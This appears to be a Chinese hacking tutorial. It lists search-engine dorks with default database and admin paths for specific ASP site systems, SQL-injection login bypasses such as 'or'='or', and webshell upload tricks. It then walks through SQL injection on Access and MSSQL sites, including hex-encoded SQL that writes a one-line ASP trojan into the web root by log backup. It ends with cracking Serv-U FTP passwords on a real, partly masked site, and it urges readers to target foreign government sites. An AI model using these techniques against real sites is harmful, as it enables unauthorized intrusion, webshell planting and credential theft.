加油!-----老菜鸟队
关键字:\30. 关键字:尚奈克斯
后台路径/system/manage.asp 直接传ASP木马 31. 工具 1:网站猎手 2:大马一个
关键字:切勿关闭Cookies功能,否则您将不能登录 插入diy.asp
32. 关键字:Team5 Studio All rights reserved 默认数据库:data/team.mdb
33. 工具: 挖掘机 辅臣数据库读取器 关键字: 企业简介 产品展示 产品列表 后缀添加: /database/myszw.mdb 后台地址: admin/Login.asp
34. 关键子 XXX inurl:Nclass.asp 在\系统设臵\里写个木马。 会被保存到 在 config.asp内。 35. 不进后台照样拿动网WEBSHELL
data.asp?action=BackupData 动网数据库备份默认路径 36. 工具:网站猎手 WebShell 关键字:inurl:Went.asp 后缀:manage/login.asp 弱口令:'or'='or'
37. 关键字:Powered by:QCDN_NEWS 随便扫遍文章加一个' ,来试探注入点 后台地址:admin_index.asp 38. 入侵雷池新闻发布系统 关键字:leichinews
去掉leichinews后面的.
打上:admin/uploadPic.asp?actionType=mod&picName=xuanran.asp 再上传马.....
进访问uppic anran.asp 登陆马.
39. 关键字:Power System Of Article Management Ver 3.0 Build 20030628 默认数据库:database\\yiuwekdsodksldfslwifds.mdb 后台地址:自己扫描!
40. 一、通过GOOGLE搜索找大量注入点 关键字:asp?id=1 gov.jp/ asp?id= 页数:100
语言:想入侵哪个国家就填什么语言吧 41. 关键字:Powered by:94KKBBS 2005 利用密码找回功能 找回admin 提问:ddddd 回答:ddddd
42. 关键字:inurl:Went.asp
加油!-----老菜鸟队
后台为manage/login.asp
后台密码: 'or'=' 或者 'or''=''or' 登录 进入 默认数据库地址:Database/DataShop.mdb 43. 关键字:六合彩 inurl:readnews.asp
把最后一个/改成\ ,直接暴库,看密码,进后台 随便添加个新闻 在标题输入我们的一句话木马 44. 工具:一句话木马
BBsXp 5.0 sp1 管理员猜解器 关键词:powered by bbsxp5.00 进后台,备份一句话马!
45. 关键字:程序核心:BJXSHOP网上开店专家 后台:/admin
4注射入侵思路及流程
一. 寻找并获得具有一定权限的注射漏洞网站
二. 找出的注射漏洞网站一般分两种数据库类型(mmsql 和access),那么不同的数据库类型当然需要不同的入侵方法。 1. mmsql数据库:
一是通过注射点爆出管理员用户和密码,找出后台登录,进一步提升权限。 二是通过注射点猜解网站所在服务器上的物理路径,从而进行差异备份插入一句话木马客户端,获得webshell后进一步进行权限提升。
2.access数据库:对于这种数据库就只能是去爆管理的用户密码,或者其他用户资料,然后进行后台登录。
成功登录后台后获取webshell的方法一般是:
1.cookie欺骗上传asp后门,如果能直接上传asp马那算你运气好。 2.在无法上传asp后门的情况下,上传图片文件后进行数据库操作功能备份成asp格式。
在网络安全攻与防之间有一门很重要的学问和艺术 社会工程学 社会工程学就是使人们顺从你的意愿、满足你的欲望。
举个例子:在你发现一台有漏洞的目标服务器 却被断开网络(物理隔离)也就成了最安全的计算机,然而你却能运用这门学问说服某人(admin)把这台有漏洞的已经隔离的计算机连上网络。
利用自己的思维去揣摩别人的心理,促使其发生的非主意识的行为。运用灵活的复杂的人际关系来获许想要得到的信息。 如何很好的利用社会工程学,前提是对网络安全各方面都要有一定的了解和自己的认识。也就是个人的综合能力,在遇到一些问题后能够运用自己所掌握的知识和学问独立的去解决一些实际问题。 题外话:当然入侵一个站点需要很好的运气,说运气不如说是目标服务器的管理员大意疏忽的一些漏洞和bug被你挖掘到了,那恭喜。 下面我们切入正题:
实例中需要运用到的工具:
流行注射工具:NBSI3、啊D-SQL注射工具 明小子web综合检测工具 一.通过baidu google 简单找注射漏洞网站。
我们进入baidu或google的高级搜索选项,以baidu为例如图1
我们要搜索内容是 被baidu收录的 具有黑客关键字的网站连接地址并且含有 asp?的网
加油!-----老菜鸟队
址(URL)。
我们就可以从中寻找具有注射漏洞的网址。 例:http://www.xxx.asp.com/show.asp?id=1
判断能否进行SQL注入:我们直接在后面加单引号’如果返回出错页面或许存在注射点。如果网站管理员对sql注入有点了解把单引号过滤掉了你用单引号测试,是测不到注入点的。
那么哪种判断方法准确呢?下面就是为你介绍的经典的1=1、1=2测试法了。看例: ① http://www.xxx.asp.com/show.asp?id=1
② http://www.xxx.asp.com/show.asp?id=1 ;;and 1=1 ③ http://www.xxx.asp.com/show.asp?id=1 ;;and 1=2
看上面三个网址返回的结果:可以注入的表现: ① 正常显示
② 正常显示,内容基本与①相同
③ 返回出错页面或提示找不到记录、或显示内容为空。
不可以注入就比较容易判断了,①同样正常显示,②和③一般都会有程序定义的错误提示,或提示类型转换时出错。
可以用一些注射相关的工具自行判断注射点如图2, 推荐这种方法,但原理还需掌握。 本教程的主题及篇幅有限,其他相关的我就不多介绍了,大家去找些关于sql原理的文章或教程看看。
二. 入侵思路及过程
access数据库:对于这种数据库就只能是去爆管理的用户密码,或者其他用户资料,然后进行后台登录。
以工具为例,注射爆出管理员用户及密码(一般MD5加密)如图3, 手工破解原理我会在附带教程里打包建议大家看sql注入天书。
进入http://www.xmd5.com/ 或http://www.cmd5.com/ 对md5 密文进行爆破。当然可以尝试暴力破解。得到解密后密码如图4
找出后台地址,登录后台,获取webshell。如图5
mmsql数据库: 爆管理员密码和access数据库类似,这里就不多讲。sql注射中的DB_OWNER角色如果把sa等同于administrator的话DB_OWNER角色相当于user权限。Sa权限的话既然是administrator,那提权就不多讲。这里讲下相当于user 的DB_OWNER权限获得webshell方法。以前通常用backup,但是如果对于大站数据库庞大,成功率可想而知。后来有了差异备份,将马的代码插入到数据库中,然后备份前后数据的差异部分。这样比直接将数据库备份在体积上大大缩小了。然而数据库内的一些数据由于偶然与备份后的代码冲突而出错导致失败,成功率仍然很低。现在最有效的方法是导出日志获得webshell。 先要了解DB_OWNER权限下通过以上方法获取webshell的一些必要条件。 1. Web和数据库在同一服务器 2. 已经得到网站绝对路径
3. 你要备份到的目的目录有写的权限 4. 有backup的权限 下面实例讲解:
注射点:http://www.xxxxx.dk/off_vis_film.asp?id=154 用工具啊D检测情况如图6 接下来试试列目录的功能,如果能列目录,仔细找,只要不是数据库与web分离的,就
加油!-----老菜鸟队
能找网站目录。这是个苦力活耐心点。 alter database ZZZZ set RECOVERY FULL create table cmd (a image)
backup log ZZZZ to disk = ''c:\\Sammy'' with init
insert into cmd (a) values (''<%Execute(request(\backup log ZZZZ to disk = ''c:\\web\\ma.asp'' [这里ZZZZ表示数据库名
c:\\web\\ 表示网站绝对路径 <%Execute(request(\一句话马] 实际操作过程中,我们把字符转换下:
先执行: alter database XXXX set RECOVERY FULL ? ? ? ? ? ? ? ? //把数据库日志备份类型转换为int
第 一 步: 新建一个临时表
create table [dbo].[sh*t_tmp] ([cmd] [image])-- 第 二 步 备份数据库日志
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x633A5C53616D6D79 backup log @a to disk = @s with init,no_truncate— (0x633A5C53616D6D79 = c:\\Sammy) 第 三 步 插入一句话马 Insert into [sh*t_tmp](cmd) values(0x3C25457865637574652872657175657374282261222929253E)— (0x3C25457865637574652872657175657374282261222929253E =<%Execute(request(\第 四 步 导出日志到网站目录下 declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s= 0x63003A005C007800780078005C0032002E00610073007000 backup log @a to disk=@s with init,no_truncate—
(0x63003A005C007800780078005C0032002E00610073007000 =c:\\web\\ma.asp) 第 五 步 删除临时表。 Drop table [sh*t_tmp]—
现在已经有人写出了工具getwebshell如图7。 工具和本文章课件会在配套教程里一起打包。
备份成功后浏览该文件应该像这样出现乱码如图8。 我们用一句话木马的控制端写入一句话代码如图9。
将备份好的http://www.xxx.com/ma.asp 密码a及webshell代码 填入 点上传 成功获得weshell
5 Php脚本注射检测后的再次提权
方法一:爆破法.
最显眼的要属用户名和密码了,关键是如何破密码呢?到网上搜了一个专门破SERV-U密码的工具(Serv-UPassCrack1.0a.rar),太慢了,这要等到何年何月啊!干脆用记事本打开它的脚本crack.vbs.看看解密原理:假设原来明文密码用\表示,密文密码也就是 我们在ServUDaemon.ini中看到的密码(34位),用\表示,密文的前两位合并上明文,然后经MD5加密后正 好等于密文的后三十二位!】
即:md5(password_mingwen+left(password_miwen,2)=right (password_miwen,32)俗话说的好啊,\工欲善其事,必先利其器\在网上找了两上绝配的工具!一个是
加油!-----老菜鸟队
MD5CrackSpV2.3(速度 增强版,一个非常好用的MD5爆破工具),另一个是字典专家.BBSt,利用它我们可以生成前两位为我们指定字母的字典!!MD5CrackSpV2.3 速度奇快,我们可以指定开的线程数,我在P4,256M内存环境下做了一个测试,利用字典专家.BBSt生成一个含3亿条记录,1.2G左右的字典, 用MD5CrackSpV2.3开8线程跑,总共用了30分钟!一个线程一秒钟跑大约2万条记录,8个线程一秒钟,就是16万条记录!!照此计算一台机器 一天就能跑约138亿条记录!假如有十台P4连合作业,威力无穷啊!同时在网上看到消息说山东大学已经研究出来了破解MD5的算法!但是没有找到具体的程序,程序一旦出世,密而不密,恐怕很多网站又要遭殃了!!
方法二:程序法. 不要在一棵树上吊死,一边挂着字典爆破,一边看看还有没有别的途径,双 管齐下吗,要不闲着也是闲着(哈哈)!在c:\\Program Files\\Serv-U\\ServUDaemon.ini文件中共有十多位用户,其中有一个的用户目录:\photo\\gallery\吸引了我。立即在浏览器中打上http://www.*****.net/ a***lover/photo/gallery 出现如下提示:\,在试试它的上一级目录看看:http://www.*****.net/ a***lover/photo/真是山重水复疑无路,柳暗花明又一村啊!原来在机子里还藏着个某某网络相册.
首先注册个用户进去看看,有图片上传功能 啊,抓包看看是否存在有类似动网UPFILE的漏洞,用NC提交后失败了,上传类型还是图片文件,又是那句话:\此路不通\。利用CASI查看http: //www.*****.net/ a***lover/photo/index.php的文件内容得知:程序中文名称:文本图片管理程序 程序英文名称:NEATPIC 版本:2.0.13 BETA,老规矩先到网上下个研究研究在说。经过分析目录结构发现在:database/user.php文件用于存放用户名密码等注册信息!用CASI 打开:http://www.*****.net/ a***lover/photo/database/user.php显示无文件内容!难道是默认目录不对?!管理员把目录改了!!看配臵文件: http://www.*****.net/ a***lover/photo/inc/config.inc.php发现: // 参数设臵
//*********************************
$DataDir = \杂项数据存放目录 $CatDir = \二级分类数据存放目录 $SortDir = \分类数据文件存放目录 $PicRecordDir = \图片数据总目录 $PicDir = \图片文件存放目录 $SPicDir = \缩略图存放目录 $CommentDir = \图片评论目录 $UserDat = \用户数据文件 $Dat = \相册数据文件
果然管理员把默认的database目录改成了database678了!现在可以用CASI查看user.php的内容了如下图:
面的哪一行即ID=1的为管理员的注册信息,第一个为用户名,第二个为密码。发现该用户名与ServUDaemon.ini中的相同,密码会不会也相同呢? (很多人都有使用同一密码的习惯!!)打开DOS窗口-->登录FTP-->输入用户名和密码,成功了,终于成功了!揪出这个密码可真不容易 啊!!这时字典还在哪挂着来,要跑出这个8位纯字母的密码也要费一段时间啊!!
一、 上传PHPSHELL,控制MYSQL数据库
通过 ServUDaemon.ini文件中的Access1=D:\\s***n\\ a***lover\\photo\\gallery